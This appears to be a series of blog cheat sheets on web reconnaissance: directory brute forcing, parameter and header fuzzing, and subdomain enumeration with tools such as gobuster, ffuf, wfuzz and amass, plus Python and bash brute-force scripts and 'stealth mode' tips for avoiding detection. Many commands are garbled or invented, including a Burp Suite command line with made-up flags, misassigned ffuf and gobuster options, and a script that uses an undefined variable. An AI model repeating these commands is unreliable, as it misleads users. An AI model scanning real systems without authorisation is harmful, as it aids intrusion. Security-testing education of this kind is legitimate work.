Directory Brute Force Tools

Directory Brute Force Tools Comprehensive collection of directory and file brute force tools for web application security testing. Gobuster Basic Directory Brute Force # Basic directory enumeration gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt # With custom wordlist gobuster dir -u http://TARGET_URL -w /path/to/wordlist.txt # With extensions gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt # With specific status codes gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -s 200,204,301,302,307,401,403 # With threads gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -t 50 # With delay gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -d 1s # With cookies gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -c "PHPSESSID=abc123" # With headers gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -H "User-Agent: CustomAgent" # With proxy gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -p http://127.0.0.1:8080 # With authentication gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -U admin -P password Advanced Gobuster Options # Recursive directory enumeration gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -r # With specific status codes to ignore gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -b 404,500 # With custom user agent gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -a "Mozilla/5.0" # With follow redirects gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -r # With timeout gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -t 10 # With output file gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -o results.txt # With quiet mode gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -q # With verbose mode gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -v Dirb Basic Directory Brute Force # Basic directory enumeration dirb http://TARGET_URL # With custom wordlist dirb http://TARGET_URL /path/to/wordlist.txt # With extensions dirb http://TARGET_URL -X .php,.html,.js,.txt # With specific status codes dirb http://TARGET_URL -S 200,204,301,302,307,401,403 # With threads dirb http://TARGET_URL -T 50 # With delay dirb http://TARGET_URL -D 1 # With cookies dirb http://TARGET_URL -c "PHPSESSID=abc123" # With headers dirb http://TARGET_URL -H "User-Agent: CustomAgent" # With proxy dirb http://TARGET_URL -p http://127.0.0.1:8080 # With authentication dirb http://TARGET_URL -u admin:password Advanced Dirb Options # Recursive directory enumeration dirb http://TARGET_URL -r # With specific status codes to ignore dirb http://TARGET_URL -b 404,500 # With custom user agent dirb http://TARGET_URL -a "Mozilla/5.0" # With follow redirects dirb http://TARGET_URL -r # With timeout dirb http://TARGET_URL -t 10 # With output file dirb http://TARGET_URL -o results.txt # With quiet mode dirb http://TARGET_URL -q # With verbose mode dirb http://TARGET_URL -v Dirbuster GUI-based Directory Brute Force # Launch Dirbuster dirbuster # Command line usage java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt # With extensions java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -e php,html,js,txt # With threads java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -t 50 # With delay java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -d 1000 # With cookies java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -c "PHPSESSID=abc123" # With headers java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -H "User-Agent: CustomAgent" # With proxy java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -p 127.0.0.1:8080 # With authentication java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -u admin:password FFuF (Fuzz Faster U Fool) Basic Directory Brute Force # Basic directory enumeration ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ # With custom wordlist ffuf -w /path/to/wordlist.txt -u http://TARGET_URL/FUZZ # With extensions ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -e .php,.html,.js,.txt # With specific status codes ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -sc 200,204,301,302,307,401,403 # With threads ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -t 50 # With delay ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -d 1s # With cookies ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -b "PHPSESSID=abc123" # With headers ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -H "User-Agent: CustomAgent" # With proxy ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -p http://127.0.0.1:8080 # With authentication ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -u admin:password Advanced FFuF Options # Recursive directory enumeration ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -recursion # With specific status codes to ignore ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -fs 404,500 # With custom user agent ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -a "Mozilla/5.0" # With follow redirects ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -r # With timeout ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -t 10 # With output file ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -o results.txt # With quiet mode ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -q # With verbose mode ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -v Wfuzz Basic Directory Brute Force # Basic directory enumeration wfuzz -w /usr/share/wordlists/dirb/common.txt http://TARGET_URL/FUZZ # With custom wordlist wfuzz -w /path/to/wordlist.txt http://TARGET_URL/FUZZ # With extensions wfuzz -w /usr/share/wordlists/dirb/common.txt -z list,.php,.html,.js,.txt http://TARGET_URL/FUZZ # With specific status codes wfuzz -w /usr/share/wordlists/dirb/common.txt --sc 200,204,301,302,307,401,403 http://TARGET_URL/FUZZ # With threads wfuzz -w /usr/share/wordlists/dirb/common.txt -t 50 http://TARGET_URL/FUZZ # With delay wfuzz -w /usr/share/wordlists/dirb/common.txt -d 1 http://TARGET_URL/FUZZ # With cookies wfuzz -w /usr/share/wordlists/dirb/common.txt -b "PHPSESSID=abc123" http://TARGET_URL/FUZZ # With headers wfuzz -w /usr/share/wordlists/dirb/common.txt -H "User-Agent: CustomAgent" http://TARGET_URL/FUZZ # With proxy wfuzz -w /usr/share/wordlists/dirb/common.txt -p 127.0.0.1:8080 http://TARGET_URL/FUZZ # With authentication wfuzz -w /usr/share/wordlists/dirb/common.txt -u admin:password http://TARGET_URL/FUZZ Custom Scripts Python Directory Brute Force import requests import threading import queue import time def directory_brute_force(url, wordlist, threads=10, delay=0): def worker(): while True: try: path = wordlist.get() if path is None: break full_url = url.rstrip('/') + '/' + path.strip() response = requests.get(full_url, timeout=10) if response.status_code == 200: print(f"[200] {full_url}") elif response.status_code == 301 or response.status_code == 302: print(f"[{response.status_code}] {full_url} -> {response.headers.get('Location', 'N/A')}") elif response.status_code == 403: print(f"[403] {full_url}") elif response.status_code == 401: print(f"[401] {full_url}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add paths to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/dirb/common.txt" wordlist = queue.Queue() directory_brute_force(url, wordlist, threads=20, delay=0.1) Bash Directory Brute Force #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/dirb/common.txt" THREADS=10 # Function to check directory check_directory() { local path=$1 local full_url="${TARGET_URL}/${path}" response=$(curl -s -o /dev/null -w "%{http_code}" "$full_url") case $response in 200) echo "[200] $full_url" ;; 301|302) echo "[$response] $full_url" ;; 403) echo "[403] $full_url" ;; 401) echo "[401] $full_url" ;; esac } # Export function for parallel export -f check_directory export TARGET_URL # Run parallel directory check cat "$WORDLIST" | parallel -j "$THREADS" check_directory {} Wordlists Common Wordlists # Dirb wordlists /usr/share/wordlists/dirb/common.txt /usr/share/wordlists/dirb/big.txt /usr/share/wordlists/dirb/small.txt /usr/share/wordlists/dirb/extensions_common.txt # SecLists wordlists /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt # Custom wordlists /usr/share/wordlists/custom/web-directories.txt /usr/share/wordlists/custom/api-endpoints.txt /usr/share/wordlists/custom/admin-panels.txt Creating Custom Wordlists # Extract directories from robots.txt curl -s http://TARGET_URL/robots.txt | grep -E '^Disallow:' | cut -d' ' -f2 | sed 's/^\///' > custom_wordlist.txt # Extract directories from sitemap.xml curl -s http://TARGET_URL/sitemap.xml | grep -oP '<loc>\K[^<]*' | sed 's|http://[^/]*/||' > custom_wordlist.txt # Combine multiple wordlists cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined_wordlist.txt # Remove empty lines and duplicates grep -v '^$' wordlist.txt | sort -u > clean_wordlist.txt Best Practices Rate Limiting # Add delay between requests gobuster dir -u http://TARGET_URL -w wordlist.txt -d 1s # Use fewer threads gobuster dir -u http://TARGET_URL -w wordlist.txt -t 10 # Use proxy rotation gobuster dir -u http://TARGET_URL -w wordlist.txt -p http://proxy1:8080 Stealth Mode # Use random user agents gobuster dir -u http://TARGET_URL -w wordlist.txt -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays gobuster dir -u http://TARGET_URL -w wordlist.txt -d 2s # Use smaller wordlists gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/small.txt Output Analysis # Save results to file gobuster dir -u http://TARGET_URL -w wordlist.txt -o results.txt # Filter by status code grep "200" results.txt grep "403" results.txt grep "301\|302" results.txt # Sort by response size sort -k3 -n results.txt Troubleshooting Common Issues # Connection timeout gobuster dir -u http://TARGET_URL -w wordlist.txt -t 5 # Too many requests gobuster dir -u http://TARGET_URL -w wordlist.txt -d 2s # Invalid SSL certificate gobuster dir -u http://TARGET_URL -w wordlist.txt -k # Authentication required gobuster dir -u http://TARGET_URL -w wordlist.txt -U admin -P password Performance Optimization # Use appropriate thread count gobuster dir -u http://TARGET_URL -w wordlist.txt -t 20 # Use smaller wordlists for initial scan gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/small.txt # Use specific extensions gobuster dir -u http://TARGET_URL -w wordlist.txt -x php,html,js Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate wordlists for the target Document findings properly Follow responsible disclosure practices

1월 10, 2025 · 7 분

Parameter Fuzzing Tools

Parameter Fuzzing Tools Comprehensive collection of parameter fuzzing tools and techniques for web application security testing. FFuF (Fuzz Faster U Fool) Basic Parameter Fuzzing # Basic parameter fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" # With POST data ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=value" # With GET parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value" # With multiple parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value&id=1" # With output file ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -o results.txt # With JSON output ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -json -o results.json # With verbose output ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -v # With silent output ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -s Advanced FFuF Options # With specific status codes ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -sc 200,204,301,302,307,401,403 # With exclude status codes ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -fs 404,500 # With threads ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 50 # With delay ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 1s # With cookies ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -b "PHPSESSID=abc123" # With headers ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -H "User-Agent: CustomAgent" # With proxy ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -p http://127.0.0.1:8080 # With authentication ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -u admin:password # With SSL options ffuf -w /usr/share/wordlists/parameter-names.txt -u "https://TARGET_URL/FUZZ" -k # With recursive fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -recursion # With wordlist for values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -w /usr/share/wordlists/parameter-values.txt -u "http://TARGET_URL?FUZZ=FUZZ2" Wfuzz Basic Parameter Fuzzing # Basic parameter fuzzing wfuzz -w /usr/share/wordlists/parameter-names.txt http://TARGET_URL/FUZZ # With POST data wfuzz -w /usr/share/wordlists/parameter-names.txt -d "FUZZ=value" http://TARGET_URL # With GET parameters wfuzz -w /usr/share/wordlists/parameter-names.txt http://TARGET_URL?FUZZ=value # With multiple parameters wfuzz -w /usr/share/wordlists/parameter-names.txt http://TARGET_URL?FUZZ=value&id=1 # With output file wfuzz -w /usr/share/wordlists/parameter-names.txt -o results.txt http://TARGET_URL/FUZZ # With JSON output wfuzz -w /usr/share/wordlists/parameter-names.txt -o results.json -f json http://TARGET_URL/FUZZ # With verbose output wfuzz -w /usr/share/wordlists/parameter-names.txt -v http://TARGET_URL/FUZZ # With silent output wfuzz -w /usr/share/wordlists/parameter-names.txt -s http://TARGET_URL/FUZZ Advanced Wfuzz Options # With specific status codes wfuzz -w /usr/share/wordlists/parameter-names.txt --sc 200,204,301,302,307,401,403 http://TARGET_URL/FUZZ # With exclude status codes wfuzz -w /usr/share/wordlists/parameter-names.txt --ss 404,500 http://TARGET_URL/FUZZ # With threads wfuzz -w /usr/share/wordlists/parameter-names.txt -t 50 http://TARGET_URL/FUZZ # With delay wfuzz -w /usr/share/wordlists/parameter-names.txt -d 1 http://TARGET_URL/FUZZ # With cookies wfuzz -w /usr/share/wordlists/parameter-names.txt -b "PHPSESSID=abc123" http://TARGET_URL/FUZZ # With headers wfuzz -w /usr/share/wordlists/parameter-names.txt -H "User-Agent: CustomAgent" http://TARGET_URL/FUZZ # With proxy wfuzz -w /usr/share/wordlists/parameter-names.txt -p 127.0.0.1:8080 http://TARGET_URL/FUZZ # With authentication wfuzz -w /usr/share/wordlists/parameter-names.txt -u admin:password http://TARGET_URL/FUZZ # With SSL options wfuzz -w /usr/share/wordlists/parameter-names.txt -k https://TARGET_URL/FUZZ # With recursive fuzzing wfuzz -w /usr/share/wordlists/parameter-names.txt -r http://TARGET_URL/FUZZ # With wordlist for values wfuzz -w /usr/share/wordlists/parameter-names.txt -w /usr/share/wordlists/parameter-values.txt http://TARGET_URL?FUZZ=FUZZ2 Burp Suite Basic Parameter Fuzzing # Using Burp Suite CLI burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt # With POST data burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -d "FUZZ=value" # With GET parameters burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -g "FUZZ=value" # With multiple parameters burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -g "FUZZ=value&id=1" # With output file burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -o results.txt # With JSON output burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -j results.json # With verbose output burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -v # With silent output burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -s Advanced Burp Suite Options # With specific status codes burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -s 200,204,301,302,307,401,403 # With exclude status codes burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -e 404,500 # With threads burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -t 50 # With delay burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -d 1 # With cookies burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -c "PHPSESSID=abc123" # With headers burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -H "User-Agent: CustomAgent" # With proxy burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -p http://127.0.0.1:8080 # With authentication burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -a admin:password # With SSL options burp -u https://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -k # With recursive fuzzing burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -r # With wordlist for values burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -w /usr/share/wordlists/parameter-values.txt -g "FUZZ=FUZZ2" Custom Scripts Python Parameter Fuzzer import requests import threading import queue import time import re def parameter_fuzzer(url, wordlist, threads=10, delay=0): def worker(): while True: try: parameter = wordlist.get() if parameter is None: break # Test GET parameter test_url = url + "?" + parameter + "=test" response = requests.get(test_url, timeout=5) if response.status_code == 200: print(f"[GET] {test_url} - {response.status_code}") elif response.status_code == 301 or response.status_code == 302: print(f"[GET] {test_url} - {response.status_code} -> {response.headers.get('Location', 'N/A')}") elif response.status_code == 403: print(f"[GET] {test_url} - {response.status_code}") elif response.status_code == 401: print(f"[GET] {test_url} - {response.status_code}") # Test POST parameter data = {parameter: "test"} response = requests.post(url, data=data, timeout=5) if response.status_code == 200: print(f"[POST] {url} - {response.status_code}") elif response.status_code == 301 or response.status_code == 302: print(f"[POST] {url} - {response.status_code} -> {response.headers.get('Location', 'N/A')}") elif response.status_code == 403: print(f"[POST] {url} - {response.status_code}") elif response.status_code == 401: print(f"[POST] {url} - {response.status_code}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add parameters to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/parameter-names.txt" wordlist = queue.Queue() parameter_fuzzer(url, wordlist, threads=20, delay=0.1) Bash Parameter Fuzzer #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/parameter-names.txt" THREADS=10 # Function to check parameter check_parameter() { local parameter=$1 # Test GET parameter test_url="${TARGET_URL}?${parameter}=test" response=$(curl -s -o /dev/null -w "%{http_code}" "$test_url") case $response in 200) echo "[GET] $test_url - $response" ;; 301|302) echo "[GET] $test_url - $response" ;; 403) echo "[GET] $test_url - $response" ;; 401) echo "[GET] $test_url - $response" ;; esac # Test POST parameter response=$(curl -s -o /dev/null -w "%{http_code}" -d "${parameter}=test" "$TARGET_URL") case $response in 200) echo "[POST] $TARGET_URL - $response" ;; 301|302) echo "[POST] $TARGET_URL - $response" ;; 403) echo "[POST] $TARGET_URL - $response" ;; 401) echo "[POST] $TARGET_URL - $response" ;; esac } # Export function for parallel export -f check_parameter export TARGET_URL # Run parallel parameter check cat "$WORDLIST" | parallel -j "$THREADS" check_parameter {} Wordlists Common Parameter Wordlists # SecLists parameter wordlists /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-names.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-values.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/api-parameter-names.txt # Custom parameter wordlists /usr/share/wordlists/custom/parameter-names.txt /usr/share/wordlists/custom/parameter-values.txt /usr/share/wordlists/custom/api-parameters.txt # Generate custom wordlists echo "id,user,admin,test,debug,dev,prod,staging" | tr ',' '\n' > custom_parameters.txt Creating Custom Wordlists # Extract parameters from JavaScript grep -oP '\.\w+\s*=' *.js | sed 's/\.//g' | sed 's/\s*=.*//g' | sort -u > js_parameters.txt # Extract parameters from HTML forms grep -oP 'name="[^"]*"' *.html | sed 's/name="//g' | sed 's/"//g' | sort -u > form_parameters.txt # Extract parameters from API documentation grep -oP '"[^"]*":\s*{' *.json | sed 's/"//g' | sed 's/:\s*{//g' | sort -u > api_parameters.txt # Combine multiple wordlists cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined_wordlist.txt # Remove empty lines and duplicates grep -v '^$' wordlist.txt | sort -u > clean_wordlist.txt Fuzzing Techniques GET Parameter Fuzzing # Basic GET parameter fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value" # With multiple parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value&id=1&name=test" # With specific values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=admin" # With encoded values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=%61%64%6d%69%6e" POST Parameter Fuzzing # Basic POST parameter fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=value" # With multiple parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=value&id=1&name=test" # With specific values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=admin" # With encoded values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=%61%64%6d%69%6e" Header Fuzzing # Basic header fuzzing ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: value" # With multiple headers ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: value" -H "X-Custom: test" # With specific values ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: admin" # With encoded values ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: %61%64%6d%69%6e" Cookie Fuzzing # Basic cookie fuzzing ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=value" # With multiple cookies ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=value; PHPSESSID=abc123" # With specific values ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=admin" # With encoded values ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=%61%64%6d%69%6e" Best Practices Rate Limiting # Add delay between requests ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 1s # Use fewer threads ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 10 # Use proxy rotation ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -p http://proxy1:8080 Stealth Mode # Use random user agents ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 2s # Use smaller wordlists ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-names.txt -u "http://TARGET_URL/FUZZ" Output Analysis # Save results to file ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -o results.txt # Filter by status code grep "200" results.txt grep "403" results.txt grep "301\|302" results.txt # Sort by response size sort -k3 -n results.txt Troubleshooting Common Issues # Connection timeout ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 5 # Too many requests ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 2s # Invalid SSL certificate ffuf -w /usr/share/wordlists/parameter-names.txt -u "https://TARGET_URL/FUZZ" -k # Authentication required ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -u admin:password Performance Optimization # Use appropriate thread count ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 20 # Use smaller wordlists for initial scan ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-names.txt -u "http://TARGET_URL/FUZZ" # Use specific wordlists ffuf -w /usr/share/wordlists/api-parameter-names.txt -u "http://TARGET_URL/FUZZ" Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate wordlists for the target Document findings properly Follow responsible disclosure practices

1월 10, 2025 · 7 분

Subdomain Enumeration Tools

Subdomain Enumeration Tools Comprehensive collection of subdomain enumeration tools and techniques for reconnaissance and web application security testing. Subfinder Basic Subdomain Enumeration # Basic subdomain enumeration subfinder -d TARGET_DOMAIN # With multiple domains subfinder -d TARGET_DOMAIN1,TARGET_DOMAIN2,TARGET_DOMAIN3 # With output file subfinder -d TARGET_DOMAIN -o results.txt # With JSON output subfinder -d TARGET_DOMAIN -o results.json -json # With verbose output subfinder -d TARGET_DOMAIN -v # With silent output subfinder -d TARGET_DOMAIN -silent # With threads subfinder -d TARGET_DOMAIN -t 50 # With timeout subfinder -d TARGET_DOMAIN -timeout 10 # With retries subfinder -d TARGET_DOMAIN -retries 3 Advanced Subfinder Options # With specific sources subfinder -d TARGET_DOMAIN -sources shodan,crtsh,passivetotal # With all sources subfinder -d TARGET_DOMAIN -all # With exclude sources subfinder -d TARGET_DOMAIN -exclude-sources shodan,crtsh # With config file subfinder -d TARGET_DOMAIN -config config.yaml # With proxy subfinder -d TARGET_DOMAIN -proxy http://127.0.0.1:8080 # With rate limit subfinder -d TARGET_DOMAIN -rate-limit 100 # With wildcard detection subfinder -d TARGET_DOMAIN -wildcard # With recursive enumeration subfinder -d TARGET_DOMAIN -recursive Amass Basic Subdomain Enumeration # Basic subdomain enumeration amass enum -d TARGET_DOMAIN # With multiple domains amass enum -d TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file amass enum -d TARGET_DOMAIN -o results.txt # With JSON output amass enum -d TARGET_DOMAIN -json results.json # With verbose output amass enum -d TARGET_DOMAIN -v # With silent output amass enum -d TARGET_DOMAIN -silent # With threads amass enum -d TARGET_DOMAIN -t 50 # With timeout amass enum -d TARGET_DOMAIN -timeout 10 Advanced Amass Options # With specific sources amass enum -d TARGET_DOMAIN -sources shodan,crtsh,passivetotal # With all sources amass enum -d TARGET_DOMAIN -all # With exclude sources amass enum -d TARGET_DOMAIN -exclude-sources shodan,crtsh # With config file amass enum -d TARGET_DOMAIN -config config.yaml # With proxy amass enum -d TARGET_DOMAIN -proxy http://127.0.0.1:8080 # With rate limit amass enum -d TARGET_DOMAIN -rate-limit 100 # With wildcard detection amass enum -d TARGET_DOMAIN -wildcard # With recursive enumeration amass enum -d TARGET_DOMAIN -recursive # With brute force amass enum -d TARGET_DOMAIN -brute # With wordlist amass enum -d TARGET_DOMAIN -w wordlist.txt Assetfinder Basic Subdomain Enumeration # Basic subdomain enumeration assetfinder TARGET_DOMAIN # With multiple domains assetfinder TARGET_DOMAIN1 TARGET_DOMAIN2 TARGET_DOMAIN3 # With output file assetfinder TARGET_DOMAIN > results.txt # With subs-only assetfinder --subs-only TARGET_DOMAIN # With alive check assetfinder --alive TARGET_DOMAIN # With verbose output assetfinder -v TARGET_DOMAIN Sublist3r Basic Subdomain Enumeration # Basic subdomain enumeration sublist3r -d TARGET_DOMAIN # With multiple domains sublist3r -d TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file sublist3r -d TARGET_DOMAIN -o results.txt # With verbose output sublist3r -d TARGET_DOMAIN -v # With threads sublist3r -d TARGET_DOMAIN -t 50 # With timeout sublist3r -d TARGET_DOMAIN -t 10 # With specific engines sublist3r -d TARGET_DOMAIN -e google,yahoo,bing # With all engines sublist3r -d TARGET_DOMAIN -e all # With exclude engines sublist3r -d TARGET_DOMAIN -e google,yahoo -x bing,duckduckgo DNSrecon Basic DNS Enumeration # Basic DNS enumeration dnsrecon -d TARGET_DOMAIN # With multiple domains dnsrecon -d TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file dnsrecon -d TARGET_DOMAIN -o results.txt # With JSON output dnsrecon -d TARGET_DOMAIN -j results.json # With verbose output dnsrecon -d TARGET_DOMAIN -v # With threads dnsrecon -d TARGET_DOMAIN -t 50 # With timeout dnsrecon -d TARGET_DOMAIN -t 10 # With specific record types dnsrecon -d TARGET_DOMAIN -t A,AAAA,CNAME,MX,NS,SOA,TXT # With all record types 